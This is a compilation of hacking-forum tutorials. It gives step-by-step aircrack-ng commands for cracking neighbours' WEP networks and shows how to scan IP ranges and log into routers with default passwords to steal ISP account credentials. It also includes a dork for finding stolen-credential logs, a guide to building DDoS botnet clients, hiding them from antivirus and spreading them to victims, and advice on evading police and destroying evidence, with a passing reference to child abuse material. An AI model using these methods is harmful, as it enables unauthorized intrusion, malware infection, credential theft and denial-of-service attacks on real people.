[Beginners Should Read This!] A Very Detailed Guide on the Basics of Wireless Hacking

So you want to crack WEP or WPA networks? First of all, it is highly recommended that you do NOT use a Windows OS to accomplish this, it’s so much easier and straightforward on Backtrack. Even if you have no prior experience with Backtrack/Linux, it is way less of a hassle in the end, trust me. Okay then, let’s get started.


Initial Backtrack Setup

First, you will need to download Backtrack 5 (or 5 R1).

There are various methods to getting Backtrack 5 up and running on your computer:

Live CD/USB
This is the simplest/quickest way to get up and running with Backtrack. Use UNetBootin to create the bootable device and make sure to allocate memory/space for a live USB if you don’t want to lose any saved files/settings upon reboot.
Tutorial here.

Persistent USB with Full Disk Encryption
This method is a little more formal/technical to set up persistence and encryption using partitions. It’s similar as to how you would install Backtrack on a hard drive but for a USB.
Tutorial here.

Dual Boot Windows and Backtrack 5
This method involves partitioning your hard drive and installing Backtrack on that newly created partition. However, you should never install a Windows OS after Backtrack/Linux useless you know what you’re doing and have backed up your shit beforehand. This is because Windows will overwrite your Backtrack boot loader and it’s a pain in the ass to fix.
Tutorial here.
Same but with full disk encryption.

Virtual Machine
Virtual Machines are particularly useful for testing out various/multiple OS and programs while still running/using your everyday OS. VM’s are isolated from the host OS as to not damaged or corrupt it while testing/messing around. But, you must have an external USB wireless adapter to crack WEP or WPA (e.g. Alfa AWUS036H).
Tutorial here.



Wireless Adapters with Compatible Chipsets

First, check here if your internal/external wireless card/adapter is compatible with Backtrack and capable of injection/monitor mode.

The Alfa AWUS036H
If you want a USB wireless adapter that’s been tried, tested and proven to work exceedingly well with Backtrack get the Alfa AWUS036H. It’s a great little device that costs roughly $30 bucks and is well worth the small investment. I own one myself and am quite pleased with it so far. And, if you want stealth in public or convenience of not carrying around an adapter, do what I did, I just slapped some velcro on the back (I don't like the suction cup holder it comes with) of the Alfa/laptop and if placed correctly with a short USB cable, it's hardly noticeable both in appearance and weight. Also, for setting the adapter the max power setting for the Alfa AWUS036H check out this video by Vivek on Securitytube. They normally come set at 20dBm when the max is 30dBm.



Types of Adapter Antennas

Omni-Directional Antennas
These are very good if you’re constantly on the move or war driving as they are usually very compact and still give you a decent amount of networks with good signal strength. The Alfa AWUS036H comes with a 5dBi Omni antenna, although they do also offer a much larger 9dBi antenna. I own both of these and I’ve made a nice little comparison for your viewing pleasure. Side note: The signal values are not static in reality, they tend to constantly vary by less than 5dBm. I’d recommend sticking with the 5dBi and get a directional antenna instead. Also, if you want a larger image size, just save it to your desktop then view it.

Directional Antennas
You have two options when it comes to directional antennas; a yagi or a panel/grid. Since the signal is directed/focused you’ll pick up fewer networks at any given time versus an Omni antenna but the signal strength will be much greater. I’d personally recommend getting a 24dBi directional grid antenna, it should be around $50 but try to get one at your local store as the antenna is fairly large and paying an extra $20+ for shipping and handling fees would really suck.



Automated Cracking of WEP and WPA

Learning to crack WEP/WPA manually helps you better understand what’s really going on behind the scenes when you crack networks but it gets really tedious typing or even pasting commands into a terminal after a while. So if you just want to plug n' play with minimal effort, Gerix or Fern Wifi Cracker are great tools to use for beginners and advanced users alike. But I prefer Gerix and as such, will not be discussing Fern below. Also you should know, WEP takes only a few minutes to crack on average so start with those networks. WPA can be impossible to crack if you use a strong enough password and also you will need a decent ATI graphics card and wordlist for it to be practical/possible to crack WPA yourself. An alternative is to use Middle's WPA cracking service, he's a reputable member who offers a great service for those who need it.

Gerix Wifi Cracker
Gerix is a great program, very easy to use even for beginners. The attacks offered for WEP are categorized in three sections by: no-client, with clients and with clients in access point and Ad-Hoc mode. In case you didn’t know, a client is a computer connected to the network. No client attacks include ChopChop (used for lower signal networks) and Fragmentation (for stronger signal networks). With clients attacks include ARP request replay, ARP request and Fragmentation. Although, you should be aware that if a client disconnects from the network while cracking, you’ll stop generating IV’s and the attack will fail. I haven’t messed around with the last category yet but attacks include Caffe-Latte and Hirte. Here’s a video tutorial on cracking WEP with Gerix.

For WPA, all that’s needed is to capture the handshake, tell Gerix the location of your dictionary and you can get cracking using normal dictionary, pyrit or rainbow tables.

And for a bonus, Gerix has a built in database that stores the ESSID, BSSID and the key for each cracked network. Pretty sweet, eh?



Manually Cracking WEP and WPA Using Terminal

For those of you who really want to learn the inner workings of wireless hacking, Vivek from Securitytube has an extensive wireless megaprimer for all you academics out there. I personally haven’t seen anyone get more detailed on concepts, theory and implementation then he does. It can get a bit dull watching these for hours on end so it’s best that you spread them out to let your brain process all the information. For a written tutorial check this out.



So, What Can You Do Once You’re On The Network?

The two most popular things people like to do once on a network is to either, attempt to gain root level access to other computers on the network or launch a Man In The Middle (MITM) attack to attain logins and passwords.

Gaining Root/Spawning a Shell
Two easy ways of accomplishing this, first using Metasploit’s db_autopwn feature that scans a host(s) and looks for vulnerabilities and uses the corresponding exploits automatically in an attempt to gain access. Or you can try out the Social Engineering Toolkit and its Java Applet Attack, the premise is to redirect a computer to your custom cloned webpage and have a java applet pop up looking as legit as possible and if the applet is run by the user, you’re in.

MITM
There is a great bash script written by comaX over on the Backtrack forums, this basically completely automates the MITM process. All you need to do is download the script and run it on Backtrack when connected to a network and there's even a nice little video showing the process.

A little copy pasta from the OP there regarding the script features plus an important side note.


You may now be wondering how to protect yourself against these attacks? Simple, just use a strong/random WPA password, keep your OS/programs updated and make sure protect ARP cache/stop ARP attacks is enabled in your firewall settings to protect against MITM.



Keep Backtrack Up to Date!

You can use this update script created by sickness over on the Backtrack forums, allowing you to update specific packages or everything all at once.

Alternatively, open up terminal and type:
apt-get update
apt-get upgrade



Other Useful Links Worth Checking Out

Metasploit.

S.E.T.

Similar link/info compilation threads.



And I want to give a special thanks to all of the authors of these tutorials on here forums and around the interwebs, without you people, I and a vast majority of others out there would have never learned of the many wonders of wireless hacking. So thank you for all your great work and contributions!
 

WEP CRACKING IN WINDOWS [FULL GUI,WITH PICS][TUT]


INTRODUCTION :
Many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on BackTrack and other Linux Tools .

Im just sharing the method to Crack WiFi networks using WEP security protocol . The WEP is a very vuarable to attacks and can be cracked
easily .
It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .
The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it .


You will be using two tools .
1.Commview for WiFi :
You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .
The more packets you capture the better chances of cracking the password .
You will need more than 1,00,000 minium packets to crack the password .
The packets will be captured in the .ncp format .
You will use this tool to convert the .ncp to .cap .

NOTE : Some WiFi cards are supported by Commview only in Windows 7 so i suggest you install Win 7 in ur Virtual Machine if ur card isnt supported .


2.Aircrack-Ng GUI :
You will use this tool to crack the password of the Access Point using the .cap files you obtained from the Commview application .

NOTE : You need to run this as administrator .

I have provided links for both the software below .




Download Links :

These are the links to the official website of the tools .
Some Anti Viruses might detect Aircrack as a virus . It is a false positive .

1.Aircrack-NG GUI

Get it from here : http://www.aircrack-ng.org/


2.Commview for Wifi

Get it from here : http://www.tamos.com/download/main/ca.php



GET READY TO CRACK :


STEP 1 :
1.Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP .
It automatically installs the necessary drivers . Allow it to install .

NOTE : You will not be able to connect to any Network using WiFi when using CommView .

STEP 2 :
2.Click on the PLAY ICON in the Left First .



STEP 3 (Choosing the Network (a) ) :
A new window should pop up now .
Click on the START SCANNING button .

STEP 4 (Choosing the Network (b) ) :
Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
NOTE : This tutorial is only for WEP protected networks .


STEP 5 (Capturing the Packets) :
The windows should close now and you should see that CommView has started Capturing Packets .


STEP 6 (Saving the Packets ) :
Now that the Packets are getting captured you need to Save them.
Click on Settings->Options->Memory Usage
Change Maximum Packets in buffer to 20000

Click on the LOGGING Tab .
Check AUTO-SAVING
In the Maximum Directory Size : 2000
Average Log File Size : 20

Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .

STEP 7 ( Concatenating the Logs ) :
Since you are capturing a lot of logs you will need to concatenate them into once file .
To do this go to Logging and click on CONCATENATE LOGS
Choose all the files that have been saved in your specified folder and Concatenate them .

Now you will have one .ncf file .

STEP 8 (Converting .ncf to .cap ) :
Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .
Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file
Now File->Export->Wireshark/TCP dump format .


------------------------------------------------------------------



Aircrack Part :


Now for the Second Part Cracking this is very simple .

Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe

Choose the .cap file and you should be able to do the others .


If you have any questions or having problems post a thread il reply .

This is a simple tutorial . There is more advance using the rules and stuff but I havnt used it yet . This worked for me . Hope you found it useful .

Took a lot of time . Please leave your feedback.

Happy Hacking ! Pirate
 

How To being Anonymous and Safe![TUT]

Hello everyone.

Being anonymous on the internet is important because as we all know, this is HackForums and there are lots of people who do black hat shit in here. So to help them, I am going to talk about how to be anonymous, how to protect your data, and how to remove all the evidences.

THE THINGS YOU NEED

A computer.
A brain.

PROGRAMS REQUIRED

1. TrueCrypt. This is a really essential program if you want to store your data. This program creates a file for you, and to open that file, you type a long password. This folder cannot be opened by any other people that doesn't know the password.

To download TrueCrypt, click the link below:

http://www.truecrypt.org/downloads

For those who are having difficulties using it, watch this video:

http://www.youtube.com/watch?v=UdVrSl9AjtU


2. Deep Freeze. This is a program that deletes everything after you restart your computer. I would definitely recommend you to download it.

To download Deep Freeze, click the link below:

http://www.faronics.com/en/Products/Deep...ation.aspx

For those who are having difficulties using it, watch this video:

http://www.youtube.com/watch?v=raYLv4Th5vI


3. TMAC. This is a program that protects your unique MAC address. MAC addresses are unique identifiers that can lead the cops onto you if you have done something wrong. TMAC is a beast when it comes to protection, so I really recommend this.


To download TMAC, click the link below:

http://www.technitium.com/tmac/index.html#download

-

Okay now these programs were about keeping your computer safe. Let's move on to internert anonymity.

1. Socks5/Proxies. I don't recommend you to find these from the internet for free, the free ones are so fucking slow and really annoys me when they don't work. I highly recommend http://www.vip72.org if you are going to do something illegal. Their service is fast, cheap and stable.

You can buy Socks5/Proxies from the address below:

http://www.vip72.com
http://www.vip72.org
http://www.vip72.asia

You can find free Socks5/Proxies by clicking the links below:

http://www.lmgtfy.com/?q=free+socks5
http://www.socks24.org

You can check your Socks5/Proxies from the website below:

http://www.sockslist.net/check

2. VPN. You should find yourself a VPN that doesn't store any logs. We don't want the authorities to get access to the websites you visit right? In my opinion, you should pay for a VPN. That's upto you of course.

You can use some of the VPN's below:

http://www.secretsline.biz - You can use DoubleVPN with this.
http://www.happy-vpn.com
http://www.swissvpn.net


3. RDPs. These are the addresses that you use to surf. For example, if you watch child porn using a RDP, and if anything happens, the real person who owns the RDP gets caught. There is RDP sellers online, you must find them. I don't know if they sell it on HF, but there are lots of sellers on forums that are carding related.

4. Public Wirelesses. You should use them if you are going to attempt something illegal. Or just learn how to crack wirelesses and use your neighbors wireless. That works too.

So that's all about protection. Now I will tell you how you can use these.

First of all, format your computer. Download your drives and after you have downloaded them, download the programs below:

Firefox
TrueCrypt
TMAC
Deep Freeze


After you format your computer, install the programs above. DO NOT GO ON HACK FORUMS YET. Set Deep Freeze, and then restart your computer. It will delete everything after you set Deep Freeze. Now start browsing freely, everything will be lost after you restart your computer anyways.


Store every single important information in your USB stick, if something happens and cops break your door, you should be able to get rid of all the evidence. If anything like that happens, just restart your computer and microwave your USB stick.


If you are going to do something blackhat, make sure that the computer you use doesn't carry any of your personal information.

Well, that's all I can tell about security and anonymity. Don't forget, you shouldn't do anything that is associated with your identity. You have a life to live, don't just waste it by getting caught. Make the cops job harder.

Thanks for reading, 
 

Hacking ADSL Routers for free accounts[TUT]

Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.

First we will download the necessary tools:

1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here: JAVA

You will also need to have version 8 OR older of Internet Explorer.

Ok so let's start with getting the job done:

1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.

2.) Open Angry IP scanner it will look like this:

[Image: pic1hr.png]


Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0

And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:

67.140.150.254

And before we click scan we need to set some options so it only shows us alive hosts:

Click Tools and then click preferences:

[Image: pic2q.png]

Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:

[Image: pic3hi.png]

And on the display tab choose "Hosts with open ports only":

[Image: pic4e.png]

Then click OK to save the preferences and click start:

[Image: pic5f.png]

After few seconds or minutes you should see your first IP addresses:

[Image: pic6c.png]

Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!

It will ask you for a login credentials:

[Image: pic7kh.png]

Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:

[Image: pic8.png]

Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.

So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:

[Image: pic9v.png]

And password in this case is: 854179


Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.

Hope you liked the tutorial.


Don't forget to comment :))
 

How to get logs of premium accounts you want SIMPLE DORK [TUT]

Hey guys !
I`m gonna show u my next trick to find logs
This time i will learn you how to get logs for a specified website !

Example :
I want a megaupload account !

We know that in many hacking forums , there are shared hundred logs from iStealer , and sure , they can be megaupload premium accounts !

So how we will get them ?
As in my first tutorial , first go to google.com !
Next , in the search field you must paste the following dork :

Code:
Program: Url/Host:http://www.megaupload.com Login: Password: Computer: Date: Ip:
[Image: TbTgt.png]
So with this dork , i`m gonna get Megaupload accounts !
If you want for example Rapidshare accounts
change the url to http://www.rapidshare.com !!
And then , after you hit Enter ,
just EnjoY with the results !
 

Host Booting [Tutorial]

Please give credit if you post this elsewhere.
*Note* All of these programs are detected as viruses. I promise you they aren't, and won't cause any harm to your computer as long as they're used correctly.


What is Host Booting?
Host Booting is a form of DDoS (Distributed Denial of Service). You build a botnet which are zombies/bots (infected computers), and you attack a specified IP with a shit load of packets. The person's modem or router becomes overwhelmed with information and slows down, possibly stops working depending on the size of your attack. Host booters are usually used for cheating in video games, but many have a TCP or SYN flood options for attacking websites.

Host Booters
(click images for download)

DDoSeR
[Image: ddoser1.png]

HostBooter
[Image: 1.PNG]

DaRK DDoSeR
[Image: dd1.png]

Darth DDoSer
*Uses any port
[Image: darth.png]

MeTuS Delphi 2.8
*Uses any port
[Image: delphi.png]

DDoSeR 3.0
*Uses any port
[Image: 30.png]

Metus 2.0 GB Edition
*Uses port 3176
[Image: gbedit.png]

BioZombie
*Uses port 3174
[Image: xr1.png]

XR Host Booter
*Uses port 3070
HERE

Creating Your Server/Bot/Virus

For MeTuS Delphi 2.8 and Darth DDoSer

  • Sign up HERE and make a redirect host to your IP address.

  • Open up MeTuS Delphi and go to the "Server Builder" tab. Put your no-ip redirect host that you created in the "Host" text box. Choose the port and stuff you want to use for connections. Edit all other settings to your liking, then click the "Build" button. The server you just created will be in the same folder that the client is located.

  • Go to the "Options" tab in the client and put the port that you used to create your server in the "Auto-Listen Port" textbox and then click "Save Settings"

  • Now all you need to do is spread the server.exe. I would recommend crypting it first because it's highly detected.


For MeTuS GB Edition

  • Click "File" at the top and and then click "Build Server"

  • Sign up at no-ip.com and make a redirect host to your IP.

  • Type your no-ip host you created in the "Redirect Host" text box and then click "Create Server"

  • Select where to save your bot and click save.


For XR

Help: http://www.youtube.com/watch?v=Na3boKQ9A0I
  • You will need Hex Workshop in order to make the bot connect to you. You can download v5 HERE. You can register it using this serial: 0749100408-037553-1EB4

  • Right click on the bot file and click "Hex Edit with Hex Workshop"

  • Press CTRL + F to open the Find box.

  • For "Type:" scroll down to "Text String". Once you've done that click on "Either" on the options. Now for the "Value" type in "LOL" and click OK.

  • Now you'll see "LOL.no-ip.info", so now you will have to go to HERE <-- Click and register. Be sure to use a REAL email address because you will need to verify it.

  • Now login to and click "Add a Host" make your no-ip hostname 3 characters. Example = AW1.no-ip.info

  • Go back to your Hex Workshop and edit the "LOL" to the no-ip you chose. DON'T OVERWRITE THE DOTS (.) IN BETWEEN THE "LOL"

  • Go to File > Save.


For BioZombie

Help: http://www.youtube.com/watch?v=Na3boKQ9A0I
  • You will need Hex Workshop in order to make the bot connect to you. You can download v5 HERE. You can register it using this serial: 0749100408-037553-1EB4

  • Right click on the bot file and click "Hex Edit with Hex Workshop"

  • Press CTRL + F to open the Find box.

  • For "Type:" scroll down to "Text String". Once you've done that click on "Either" on the options. Now for the "Value" type in "EDIT" and click OK.

  • Now you'll see "EDITT22.no-ip.info", so now you will have to go to click here Be sure to use a real email address because you will need to verify it.

  • Now login to and click "Add a Host" make your no-ip hostname 7 charactors. Example :: ABCD123.no-ip.info

  • Go back to your Hex Workshop and edit the "EDITT22" to the no-ip you chose.

  • Go to File > Save.


Spreading Your Server/Bot/Virus
Spreading is the hardest part of the process, finding where all the stupid people download from. One method of spreading is torrents. To find out how to make and spread torrents MediaFire. Another method is YouTube videos. You make a video of something that someone wants, upload your virus to a downloading site like MegaUpload or click here and say it's what they want. You can also spread on forums. I won't explain it all, just say it's something that the members would want and post it for download.

Crypting and Binding
Binders and crypters are used to make your virus less detectable by Anti-Virus programs. binders allow you to combine your virus with another file, meaning that both files will open. Crypters are used to usually just make your virus less detectable. Some advanced ones can compress and do a lot of other things too. For some free binders and crypters How to Get IPs on Xbox Live. Paid and privately sold crypters are usually much better. You'll have to search for those yourself.

Port Forwarding
You need to open ports to accept the incoming connections from the infected zombies, and also to send outgoing commands to them. For help on opening ports please go to http://portforward.com/ The ports that the above host booters run on are listed directly below the title of them.

Video Tutorials
Note: This Tutorial is not written by me all Credit goes to Brent328.

 

Access Blocked Websites in Schools , Colleges and Offices


Hi friends Today we will tell you how to access blocked Websites.Websites like facebook, twitter and other social networking sites are generally blocked in schools, colleges and offices. There exist some tricks by which you can bypass the restrictions and access blocked sites, the most obvious is the use of proxies or Anonymizer websites. But using proxies doesn’t always works as they gets blocked by firewall as well . Here I am listing some other methods to access blocked contents.


1. Use IP instead of URL

Each website has its equivalent ip address . This method works best when blocked sites are stored as a list of URLs .You can use ip address to access blocked contents . For example to access facebook you can use ip address 69.63.189.11 in your address bar . You can use ip-address.com to find the ip address of other websites .


2. Use Google Cache
All major search engines like Google yahoo and Bing stores cached pages of websites themselves . You can access blocked websites by viewing their cached copy on search engines .




3. Translations services
Translation services like Google Translate , translate a website from one language to another and display the translated results on their own page .You can access the blocked website by re-translating blocked url using such online translation services .


4. Retrieve web pages via Email
Web2Mail is a free service that sends any websites into your inbox. All you need to do is send an email to www@web2mail.com with the URL as subject title.


5. WayBack Machine
Wayback machine periodically keeps a copy of almost all websites on the internet from the date they have started . You can access your blocked site by fetching its latest copy from archives .


6. Screen-Resolution.com
Screen-Resolution.com allows you to view any website in a different resolution . This could be an interesting tool to access blocked websites .


7. Google Mobile Search
Google Mobile Search displays a web page as if you are viewing it on a mobile phone .You can use it to access blocked websites but javascript and css will be disabled .


8. Redirect with Short URL service
Short URL service are used for converting a long URL in a shorter one . You can convert your blocked url into a shorter one and use it to access blocked websites . This trick dont always works . The two popular url shortening service are bit.ly and adf.ly


9. USB Browsing
You can use this method if you have access to usb port ,you can load usb with your own portable Firefox, with the portable Tor plugin or you can directly use tor-firefox .or you can use USB browsing using mojo pack or any other software for this method..


10. Proxy Websites
This is the generally known method to access blocked websites . There are thousands of online proxies you can use to surf anonymously or to access blocked websites .


Regards -- Hemal
 

How To Avoid Giving A Class Presentation [TUT]

Ok, so i'm sure you've all been in that situation at school / college where you've been given the task of creating a powerpoint presentation to show the class.

I'm sure you've also been in the situation where you've not bothered to do it. So, you walk into class, with no presentation and the tutor isn't best pleased with you.

Solution

Before class,

1) Open powerpoint, and create a blank powerpoint presentation.

2) save the presentation with a convincing name eg BiologyPresentation

3) next, close powerpoint and open notepad.

3) while in notepad, go to file > open > YOURFILE

4) when your file opens in notepad you will see the code of your powerpoint file.

5) mess with this code. delete chunks. and replace chunks with random crap. then save the file.

When you go to open the .ppt file in powerpoint, you will receive an error and it will say your presentation is corrupted. The teacher will probably be none the wiser and it will appear you have attempted the assignment but there was some dodgy computer mix up and you are not to blame.


NOTE: This may not fool all teachers.
You may wish to fill the original blank powerpoint with a few images to increase the file size which will make it more believable to any eagle eyed teachers.

This has worked for me but i don't guarantee 100% succcess.

Good luck and i hope it helped.
 

WEP cracking with Fern WIFI Cracker - Almost To Easy[Tut]

Warning!
If you want to learn about using Aircrack-ng, Linux, network and so on do not use this tutorial. If you just want to crack a WEP network without learning anything this is the tutorial for you!

Fern Wifi Cracker is a GUI for Aircrack-ng, it makes cracking WEP it so damn simple. I’m on Backtrack 4 here and the only thing you will need download and installing Fern Wifi cracker is to open the terminal and use these two commands: (if you on another distro you might need to install some packets first )
Code:
wget http://fern-wifi-cracker.googlecode.com/files/Fern-Wifi-Cracker_1.2_all.deb
dpkg -i Fern-Wifi-Cracker_1.2_all.deb

To start the program go to:
Code:
/usr/share/applicationsFern_Wifi_Cracker.desktop

The first time you open Fern Wifi cracker, you’ll need to update it from 1.2 to version 1.5. You will see the text New update is Available

1. Click the Update button

[Image: snapshot1_tilpasset.png]

Wait for the update to be installed. You will see the text Please Restart application

2. Shutdown the application and start it back up again

[Image: snapshot2_tilpasse.png]

You will now see the text Latest update is already installed

3. Click the dropdown list Select interface

4. Select the interface you want to use

[Image: snapshot3_tilpasse.png]

After a minute a popup will open.

5. Click the Ok bottom

[Image: snapshot4_tilpasse.png]

Optional!
The next part might be unnecessary, but it’s my personally experience that cracking a network with connected client is much easier then without. Since this is a beginner tutorial I will not go in to why.

6. Doubleclick in any area of the main window

7. A window call Access Point Scan Preferences opens

8. Click the Enable XTerms checkbox

9. Click the Ok bottom

[Image: snapshot5_tilpasse.png]

Let’s start sniffing for Accesspoint nearby.

10. Click the Scan bottom

[Image: snapshot6_tilpasse.png]

If you did the part with enabling XTerm - two popups will appear. Since this tutorial will only show WEP cracking you can close the one named FERN (WPA SCAN). Now let’s have a look at the window called FERN (WEP SCAN). We need a accesspoint with a client connected to it. At the top half of the screen we see all the accesspoints in the area, and a lot of information about them. At the bottom of the window we see that a client is connected to a Accesspoint with the BSSID 00:13:f7:61:24:DA. If we compare this list in the top of the screen we will see that the name of this Accesspoint is SMC.So now we know that the accesspoint SMC have a client connected.

11. Close the window FERN (WEP SCAN)

[Image: snapshot7_tilpasse.png]

12. Click the WEP button

The window Fern WEP Attack opens.

13. Click the dropdown list at the top of the window

14. Select the access point SMC that we found before

[Image: snapshot9_tilpasse.png]

15. Click the Attack bottom and wait for the magic to happen.

If you did the part with enabling Xterm, two additional windows will open, just leave them be.

[Image: snapshot10_tilpasse.png]

Sit back and wait for the key to the network to appear!

[Image: snapshot13.png]
 

[Wi-Fi Hack]Cracking WEP with aircrack-ng [Tut]

Welcome all. I've been getting a lot of questions lately on how to use aircrack-ng so I have decided to make a series of tutorials on the subject. This is my first tut. on Wi-Fi so bear with me. :)

Also, this tutorial is for educational purposes only. I will not be held responsible for anything you do with this information.

Things you will need

Backtrack--> any version will suffice.

Download Here!

Or any distro with aircrack installed.

First things first, we want to spoof our mac address and enable monitor mode


Code:
airmon-ng stop wlan0 #or whatever your interface is you can type ifconfig to see it

ifconfig wlan0 down

macchanger -m 00:11:22:33:44:55 wlan0

ifconfig wlan0 up

airmon-ng start wlan0

Now, these commands will change the mac address of your interface so .log files will not contain your true mac. Fairly simple

[Image: snapshot1tn.png]

Now once this has been accomplished we want to view the networks in our area.
We can do this by typing this
Code:
airodump-ng wlan0

or to use monitor mode (no transmissions which helps with anonymity)

Code:
airodump-ng mon0

You will get a screen that will look something like this.

[Image: snapshot2wn.png]

Once you get to this screen and you see which network you want to crack you will press ctrl + c .
This ends the process and enables you to copy the bssid or Access point Mac address to your clipboard for later use.

Now you want to tell airodump-ng to only listen to the network you are trying to crack, and create a .cap file for aircrack to crack later.
So you will run
Code:
airodump-ng -c 6 -w test --bssid E0:91:F5:E5:9E:2A wlan0

With airodump-ng the -c option tells it to listen on channel 6 which our test network is on and the -w creates a file named test-01.cap where airodump will store the information it captures for our cracking purposes. Now its time to open a new terminal.
In this terminal we want to associate ourselves with the router so we will run...
Code:
aireplay-ng -1 6000 -q 12 -o 1 -a E0:91:F5:E5:9E:2A wlan0

The -1 attack is the fake authentication attack it will associate us with the router (access point) every 6000 seconds. The -q option sets aireplay-ng to send keep-alive packets every 12 seconds, and the -o option sets the number of packets per burst to the default number. The -a option sets the access points mac to send the attack to. You will get a screen that looks like this.

[Image: snapshot4cz.png]

Now we need to open up another terminal so we can tell the router to send us ARP request packets. We will run the following command.
Code:
aireplay-ng -3 -b E0:91:F5:E5:9E:2A -h 00:11:22:33:44:55 wlan0

The -3 command tells aireplay to use the ARP request replay attack and the -b tells it to filter only ARP packets from the access point we are cracking.Also the -h command tells it to send the router your fake mac address as the source of the requests. You will get a screen that looks like this.

[Image: snapshot5zy.png]

Now you should see the data column from airodump-ng start climbing very rapidly. This is what we want. Usually it takes about 10,000 data packets to crack the key.

It is now time to crack the password.
Code:
aircrack-ng -b E0:91:F5:E5:9E:2A test-01.cap

This will crack the .cap file we created earlier, and you will end up with a screen like this.

[Image: snapshot6w.png]

Now all you have to do is write down the key, and input it to the router when it asks for the key. When you do this you dont put the : just the letters and number.
Well that's it. I hope this helps all of you that have questions. And I will be writing a tutorial on WPA cracking with aircrack in the near future.

I worked really hard on this so if you would leave some feedback i would really appreciate it. Also if you need help with troubleshooting, leave a comment! :)
 

Download 1500+ Pro*y Server's List | All tested and Working Free Pro*y Servers

This summary is not available. Please click here to view the post.